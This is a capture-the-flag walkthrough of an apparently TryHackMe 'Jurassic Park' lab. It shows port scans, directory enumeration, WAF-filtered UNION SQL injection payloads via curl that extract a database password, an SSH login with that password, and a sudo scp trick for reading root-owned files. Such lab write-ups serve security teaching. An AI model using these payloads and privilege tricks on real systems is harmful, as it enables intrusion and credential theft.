Jurassic Park
Port scanning
Starting with a fast port scan to see which ports are open.
|
1 2 3 4 5 6 7 8 9 10 |
root@lab:~/THM/JurassicPark# nmap -T4 -sS -p- jurassic.park Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-30 20:40 CEST Nmap scan report for jurassic.park (10.10.10.170) Host is up (0.036s latency). Not shown: 65533 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 20.65 seconds |
Then more options specific targeted on the open ports to get more information.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
root@lab:~/THM/JurassicPark# nmap -T4 -sS -sV -sC -p22,80 jurassic.park Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-30 20:40 CEST Nmap scan report for jurassic.park (10.10.10.170) Host is up (0.032s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 9a:fb:a3:13:72:b3:53:59:94:b8:16:02:d1:d2:7e:32 (RSA) | 256 76:32:44:a0:39:24:97:44:4f:43:7b:01:39:fb:cd:84 (ECDSA) |_ 256 33:7e:04:8e:db:96:06:af:20:90:a2:81:3d:45:db:8f (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Jarassic Park Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.04 seconds |
Not much information and a misspelled Jarassic Park as title of the website.
On the main page is again the misspelled name……maybe it’s not misspelled but a hint for JAR files?
In the source code there is a comment:
|
1 |
<!-- <video src="assets/theme.mp3" autoplay> --> |
Some web enumeration shows a folder.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
root@lab:~/THM/JurassicPark# dirsearch -u http://jurassic.park -e php -x 404 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt _|. _ _ _ _ _ _|_ v0.3.8 (_||| _) (/_(_|| (_| ) Extensions: php | HTTP method: get | Threads: 10 | Wordlist size: 207627 Error Log: /opt/tools/dirsearch/logs/errors-19-09-30_20-43-13.log Target: http://jurassic.park [20:43:13] Starting: [20:43:13] 200 - 1KB - / [20:43:14] 301 - 315B - /assets -> http://jurassic.park/assets/ [20:43:33] 200 - 65B - /delete [20:48:11] 403 - 301B - /server-status Task Completed |
|
1 2 3 4 |
root@lab:~/THM/JurassicPark# curl jurassic.park/delete New priv esc for Ubunut?? Change MySQL password on main system! |
There is also a shop with a parameter in the URI. When replacing the number with a single quote, I get a very nice result.
And at the bottom the text: YOU DIDN’T SAY THE MAGIC WORD! Try SqlMap.. I dare you..
But when entering a double quote I get a better result, namely an SQL error.
Before continuing with the SQLi option, I first want to check out the parameter first.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 |
root@lab:~/THM/JurassicPark# for i in {1..25}; do echo -e "id=$i\n\n" && curl -s http://jurassic.park/item.php?id=$i | grep -A 10 '<body>' && echo -e '\n------------------------------------------------\n'; done id=1 <body> <section class='black text-center'> <a href="/index.php"><img width=300px src="assets/Jurassic-Park-Logo.png"></a></br></br> <h1>Gold Package</h1></br> </section> <div class="container text-center"> <h3>Price: $500000</h3></br> <div class="alert alert-primary" role="alert"><b>4</b> of these packages have been sold in the last hour.</div></br> <h4>Childen under 5 can attend free of charge and will be eaten for free. This package includes a dinosaur lunch, tour around the park AND a FREE dinosaur egg from a dino of your choice!</h4> </br><h4>Order yours quick by calling us!</h4> ------------------------------------------------ id=2 <body> <section class='black text-center'> <a href="/index.php"><img width=300px src="assets/Jurassic-Park-Logo.png"></a></br></br> <h1>Bronse Package</h1></br> </section> <div class="container text-center"> <h3>Price: $250000</h3></br> <div class="alert alert-primary" role="alert"><b>11</b> of these packages have been sold in the last hour.</div></br> <h4>Children under 5 can attend free of charge and eat free. This package includes a tour around the park and a dinosaur lunch! Try different dino's and rate the best tasting one!</h4> </br><h4>Order yours quick by calling us!</h4> ------------------------------------------------ id=3 <body> <section class='black text-center'> <a href="/index.php"><img width=300px src="assets/Jurassic-Park-Logo.png"></a></br></br> <h1>Basic Package</h1></br> </section> <div class="container text-center"> <h3>Price: $100000</h3></br> <div class="alert alert-primary" role="alert"><b>27</b> of these packages have been sold in the last hour.</div></br> <h4>Children under 5 can attend for free and eat free. This package will include a basic tour around the park in the brand new automated cars!</h4> </br><h4>Order yours quick by calling us!</h4> ------------------------------------------------ id=4 id=5 <body> <section class='black text-center'> <a href="/index.php"><img width=300px src="assets/Jurassic-Park-Logo.png"></a></br></br> <h1>Development Package</h1></br> </section> <div class="container text-center"> <h3>Price: $0</h3></br> <div class="alert alert-primary" role="alert"><b>0</b> of these packages have been sold in the last hour.</div></br> <h4>Dennis, why have you blocked these characters: ' # DROP - username @ ---- Is this our WAF now?</h4> </br><h4>Order yours quick by calling us!</h4> ------------------------------------------------ id=6 id=7 id=8 |
So there is some useful information when entering id=5.
Ok….so let’s recap what we have so far.
There is a parameter which is vulnerable to SQLi, but there are some defensive settings in place. I have running a sqlmap with WAF tampering options running in the background, but it has not gotten anything viable. So until I can let sqlmap do the dumping of the database, I have to do some manual labor myself.
SQL Injection
#1 What is the SQL database called which is serving the shop information?
|
1 2 |
root@lab:~/THM/JurassicPark# curl -s "http://jurassic.park/item.php?id=5%20UNION%20SELECT%201,database(),3,4,5" | \grep '<h1>' | cut -d '>' -f2 | cut -d '<' -f 1 park Package |
#2 How many columns does the table have?
That’s clear from the previous command: 5
#3 Whats the system version?
|
1 2 |
root@lab:~/THM/JurassicPark# curl -s "http://jurassic.park/item.php?id=5%20UNION%20SELECT%201,version(),3,4,5" | \grep '<h1>' | cut -d '>' -f2 | cut -d '<' -f 1 5.7.25-0ubuntu0.16.04.2 Package |
#4 What is dennis’ password?
Because there is a filter on ‘username’ I need to guess the table and column names a bit. After a little while I get a password.
|
1 2 |
root@lab:~/THM/JurassicPark# curl -s "http://jurassic.park/item.php?id=5%20UNION%20SELECT%201,password,3,4,5%20from%20users" | \grep '<h1>' | cut -d '>' -f2 | cut -d '<' -f 1 ih8dinos Package |
#5 Locate and get the first flag contents.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 |
root@lab:~/THM/JurassicPark# ssh dennis@jurassic.park The authenticity of host 'jurassic.park (10.10.150.111)' can't be established. ECDSA key fingerprint is SHA256:/qDcDUmBukzaryWv8jvW3cafeByJkfebR0UcVxD/wVE. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'jurassic.park,10.10.150.111' (ECDSA) to the list of known hosts. dennis@jurassic.park's password: Welcome to Ubuntu 16.04.5 LTS (GNU/Linux 4.4.0-1072-aws x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage Get cloud support with Ubuntu Advantage Cloud Guest: http://www.ubuntu.com/business/services/cloud 62 packages can be updated. 45 updates are security updates. The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. dennis@ip-10-10-150-111:~$ ls -lah total 44K drwxr-xr-x 3 dennis dennis 4.0K Sep 30 20:20 . drwxr-xr-x 4 root root 4.0K Feb 16 2019 .. -rw------- 1 dennis dennis 1001 Feb 16 2019 .bash_history -rw-r--r-- 1 dennis dennis 220 Feb 16 2019 .bash_logout -rw-r--r-- 1 dennis dennis 3.7K Feb 16 2019 .bashrc drwx------ 2 dennis dennis 4.0K Sep 30 20:20 .cache -rw-rw-r-- 1 dennis dennis 93 Feb 16 2019 flag1.txt -rw-r--r-- 1 dennis dennis 655 Feb 16 2019 .profile -rw-rw-r-- 1 dennis dennis 32 Feb 16 2019 test.sh -rw------- 1 dennis dennis 4.3K Feb 16 2019 .viminfo dennis@ip-10-10-150-111:~$ cat flag1.txt Congrats on finding the first flag.. But what about the rest? :O b89f2d69c56b9981ac92dd267f |
#6 Whats the contents of the second flag?
|
1 2 3 4 5 6 7 8 9 10 11 12 13 |
dennis@ip-10-10-150-111:~$ find / -iname "flag*" -type f 2>/dev/null /home/dennis/flag1.txt /sys/devices/pnp0/00:06/tty/ttyS0/flags /sys/devices/vif-0/net/eth0/flags /sys/devices/virtual/net/lo/flags /sys/devices/platform/serial8250/tty/ttyS1/flags /sys/devices/platform/serial8250/tty/ttyS2/flags /sys/devices/platform/serial8250/tty/ttyS3/flags /usr/src/linux-aws-headers-4.4.0-1072/scripts/coccinelle/locks/flags.cocci /usr/src/linux-headers-4.4.0-1072-aws/include/config/zone/dma/flag.h /boot/grub/fonts/flagTwo.txt dennis@ip-10-10-150-111:~$ cat /boot/grub/fonts/flagTwo.txt 96ccd6b429be8c9a4b501c7a0b117b0a |
#7 Whats the contents of the third flag?
|
1 2 |
dennis@ip-10-10-150-111:~$ cat .bash_history Flag3:b4973bbc9053807856ec815db25fb3f1 |
#8 Whats the contents of the fourth flag?
|
1 2 |
dennis@ip-10-10-150-111:~$ cat .viminfo > /tmp/flagFour.txt |
But there is no /tmp/flagFour.txt. When reading the discord chatroom, this is confirmed by the creator of the room.
#9 Whats the contents of the fifth flag?
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 |
dennis@ip-10-10-150-111:~$ sudo -l Matching Defaults entries for dennis on ip-10-10-150-111.eu-west-1.compute.internal: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User dennis may run the following commands on ip-10-10-150-111.eu-west-1.compute.internal: (ALL) NOPASSWD: /usr/bin/scp dennis@ip-10-10-150-111:~$ ls -ld /usr/bin/scp -rwxr-xr-x 1 root root 80016 Nov 5 2018 /usr/bin/scp dennis@ip-10-10-150-111:~$ cat test.sh #!/bin/bash cat /root/flag5.txt dennis@ip-10-10-150-111:~$ sudo scp -r /root/flag5.txt /tmp dennis@ip-10-10-150-111:~$ ls -lah /tmp total 40K drwxrwxrwt 9 root root 4.0K Sep 30 20:25 . drwxr-xr-x 23 root root 4.0K Sep 30 19:46 .. -rw-r--r-- 1 root root 33 Sep 30 20:25 flag5.txt drwxrwxrwt 2 root root 4.0K Sep 30 19:46 .font-unix drwxrwxrwt 2 root root 4.0K Sep 30 19:46 .ICE-unix drwx------ 3 root root 4.0K Sep 30 19:46 systemd-private-eed490776f0c401db680b0c43a10f612-systemd-timesyncd.service-02qwMJ drwxrwxrwt 2 root root 4.0K Sep 30 19:46 .Test-unix drwxrwxrwt 2 root root 4.0K Sep 30 19:46 .X11-unix drwxrwxrwt 2 root root 4.0K Sep 30 19:46 .XIM-unix dennis@ip-10-10-150-111:~$ cat /tmp/flag5.txt 2a7074e491fcacc7eeba97808dc5e2ec |